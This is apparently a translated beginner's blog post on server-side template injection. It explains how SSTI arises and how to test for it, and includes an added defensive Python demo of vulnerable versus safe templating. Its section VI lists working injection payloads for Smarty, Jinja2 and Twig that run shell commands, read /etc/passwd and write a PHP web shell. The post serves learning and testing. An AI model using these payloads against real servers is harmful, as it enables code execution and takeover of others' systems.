SSTI template injection
2022-07-27 08:10:00 【weixin_53150004】
Preface
This article is only a simple walkthrough of exploitation. Because my level is limited for now, I cannot say much about in-depth code auditing, so I will not explain it and will only talk about the exploits. I will make up for the code-audit part and some further exploits later.
A small note about this article
You can also read my learning summary article; I will add other exploitation techniques there.
I. Injection
Definition of injection: injection is one manifestation of the format string vulnerability.
II. What is SSTI template injection?
SSTI (Server-Side Template Injection) is also a very good example of a format string problem. Development today has settled into a very mature MVC pattern: our input is received by V, handed to C, C then calls M or another C to process it, and the result is finally returned to V, which is what we end up seeing. In V, a technology called templates is used everywhere. Remember: wherever templates are used, there may be an SSTI problem. SSTI does not belong to any one language, and neither does sandbox bypass. A sandbox is just a protection mechanism that a template engine designed after a large security flaw was found in it: modules that are not defined or declared are not allowed. This applies to all template engines.
III. Common template engines
- PHP
  - Smarty
    Smarty is a very old PHP template engine. It is a classic and is widely used.
  - Twig
    Twig comes from the Symfony template engine and is very easy to install and use. It works somewhat like Mustache and Liquid.
  - Blade
    Blade is the simple yet powerful template engine provided by Laravel.
    Unlike other popular PHP template engines, Blade does not restrict the use of native PHP code in views. All Blade view files are compiled into native PHP code and cached; unless they are modified they are not recompiled, which means Blade adds basically no extra burden to your application.
- Java
  - JSP
    This is what beginners use. To be honest, it seems a bit outdated now, but there is still a large amount of it deployed online.
  - FreeMarker
    FreeMarker is a template engine: a general-purpose tool that generates output text (HTML pages, e-mails, configuration files, source code, etc.) from a template and the data to be filled in. It is not aimed at end users; it is a Java class library, a component that programmers can embed in their products.
  - Velocity
    Velocity, a template engine with a long history, can not only replace JSP as the web page template engine on the Java Web server side, but can also be used as a template engine for ordinary text to enhance the text-processing ability of server programs.
- Python
  - Jinja2
    Flask and Jinja2 are always mentioned together; it is widely used.
  - django
    django uses its own template engine, which I will simply call django here. Everyone knows django is known for rapid development and has its own easy-to-use ORM; many of its parts are tightly coupled, so you cannot mix in anything else. That is a characteristic of django.
  - tornado
    tornado also has its own template engine; tornado's emphasis is on asynchronous, non-blocking, high concurrency.
IV. How SSTI arises
After the server receives the user's malicious input, it uses it without any processing as part of the Web application's template content. When the template engine compiles and renders the target, it executes the statement the user inserted that breaks out of the template, which may lead to disclosure of sensitive information, code execution, GetShell and other problems.
V. Test method
As with conventional SQL injection detection and XSS testing, template injection is detected by carrying a specific payload in the passed parameter and judging from the returned content. Each template engine has its own syntax, so payload construction requires different scanning rules for each template engine, just as SQL injection has different database types.
Simply put, the request parameter is changed so that it carries the payload, and the content returned by page rendering is checked to see whether the carried payload was compiled and parsed. If it was parsed, injection for the template engine corresponding to that payload is confirmed; otherwise there is no SSTI.
Note: sometimes what looks like XSS may actually be an SSTI vulnerability. Although template engines apply XSS filtering in most cases, unexpected situations cannot be ruled out. For example:
some template engines (such as Jinja2) by default only apply XSS filtering to files with specific suffixes (html, xhtml, etc.).
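The following is an added example, not code from the original article, and it uses a tiny template engine written for this purpose rather than Jinja2 or Smarty. It makes three points from sections II, IV and V concrete: user input that becomes part of the template source is compiled and evaluated (the SSTI pattern), user input passed as a context variable is only data, and a sandbox that refuses anything not explicitly allowed (attribute access, subscripts, calls) stops the kind of object-traversal expressions listed later in the article. The `{{ expr }}` syntax, the `APP_CONTEXT` values and the `greet_*`, `evaluates_user_input` and `sandbox_rejects` functions are all constructed for the demonstration.

```python
import ast
import operator
import re

# Constructed sample context, standing in for the configuration a real
# application exposes to its templates (the value is not a real secret).
APP_CONTEXT = {"app_name": "demo", "secret_key": "CONSTRUCTED-SECRET-NOT-REAL"}

EXPR_RE = re.compile(r"\{\{(.*?)\}\}")
_BINOPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul}


class TemplateError(Exception):
    """Raised when an expression uses something the sandbox does not allow."""


def _eval_node(node, context):
    """Evaluate a parsed expression, allowing only literals, context names and + - *."""
    if isinstance(node, ast.Constant) and isinstance(node.value, (int, float, str)):
        return node.value
    if isinstance(node, ast.Name):
        if node.id not in context:
            raise TemplateError(f"undefined variable {node.id!r}")
        return context[node.id]
    if isinstance(node, ast.BinOp) and type(node.op) in _BINOPS:
        left = _eval_node(node.left, context)
        right = _eval_node(node.right, context)
        return _BINOPS[type(node.op)](left, right)
    # Attribute access, subscripts, calls and everything else are refused. This is
    # the "sandbox" the article describes: anything not declared to the engine
    # is rejected, so __class__ / __subclasses__ style traversal cannot start.
    raise TemplateError(f"disallowed expression: {type(node).__name__}")


def evaluate(expr, context):
    tree = ast.parse(expr.strip(), mode="eval")
    return _eval_node(tree.body, context)


def render(template, context):
    """Replace every {{ expr }} in the template source with its evaluated value.
    Substituted values are not re-scanned, exactly like a real engine."""
    return EXPR_RE.sub(lambda m: str(evaluate(m.group(1), context)), template)


def greet_vulnerable(user_input):
    # SSTI pattern (section IV): user input is concatenated into the template
    # *source*, so any {{ ... }} it contains is compiled and evaluated.
    return render("Hello " + user_input + "!", APP_CONTEXT)


def greet_safe(user_input):
    # Safe pattern: the template is a fixed string and user input is only *data*
    # in the context, so {{ ... }} inside it is printed back literally.
    return render("Hello {{ name }}!", dict(APP_CONTEXT, name=user_input))


def evaluates_user_input(greet):
    """Check for your own test suite (section V): is template syntax placed in
    user data evaluated by the page, or echoed back unchanged?"""
    probe = "{{ 2 * 21 }}"
    try:
        out = greet(probe)
    except TemplateError:
        return False
    return probe not in out and "42" in out


def sandbox_rejects(user_input):
    """True if the sandbox refuses the expression instead of evaluating it."""
    try:
        greet_vulnerable(user_input)
    except TemplateError:
        return True
    return False


if __name__ == "__main__":
    print(greet_vulnerable("{{ 2 * 21 }}"))      # Hello 42!  (expression evaluated)
    print(greet_safe("{{ 2 * 21 }}"))            # Hello {{ 2 * 21 }}!  (treated as data)
    print(greet_vulnerable("{{ secret_key }}"))  # leaks the context value
    print(evaluates_user_input(greet_vulnerable), evaluates_user_input(greet_safe))
    print(sandbox_rejects("{{ ''.__class__ }}"))  # True
```

The fix for `greet_vulnerable` is not filtering the input but moving it out of the template source and into the context, as `greet_safe` does; the sandbox is a second, independent layer that limits what a template expression can reach even when the first mistake has been made.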
VI. Attack ideas
1. Attack directions
(1) The template itself
(2) The framework itself
(3) The language itself
(4) The application itself
2. Exploits
I have not yet collected enough exploitation methods, so I will just paste what I have.
Smarty template injection (I was using if statements when I took these notes, so they are left as they are):

{if phpinfo()}{/if}
{if readfile('file path')}{/if}
{if show_source('file path')}{/if}
{if passthru('command')}{/if}
{if system('command')}{/if}
{system('cat /flag')}
{self::getStreamVariable("file:///etc/passwd")}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php eval($_GET['cmd']); ?>",self::clearConfig())}

Conventional usage:

{$smarty.version}   # get the Smarty version number
{php}phpinfo();{/php}   # execute the corresponding PHP code; in Smarty 3.1, {php} is only available in SmartyBC
<script language="php">phpinfo();</script>
{self::getStreamVariable("file:///etc/passwd")}
and so on...

Jinja2:

Python2:
# (system can be replaced with popen('').read(); the os module needs to be imported)
{{ ''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('ls').read()") }}
# (no need to import the os module; it is called directly through another module)
{{ ().__class__.__bases__[0].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read() }}
# commonly used py2 EXP
().__class__.__base__.__subclasses__()[59].__init__.__globals__['__builtins__']['eval']("__import__('os').system('whoami')")

Python3:
{{ ().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['eval']("__import__('os').popen('id').read()") }}

Twig:
{{ _self.env.registerUndefinedFilterCallback("exec") }}{{ _self.env.getFilter("id") }}
VII. Summary
At this stage, just learn how to find the vulnerability; there is no need to dig deeper yet.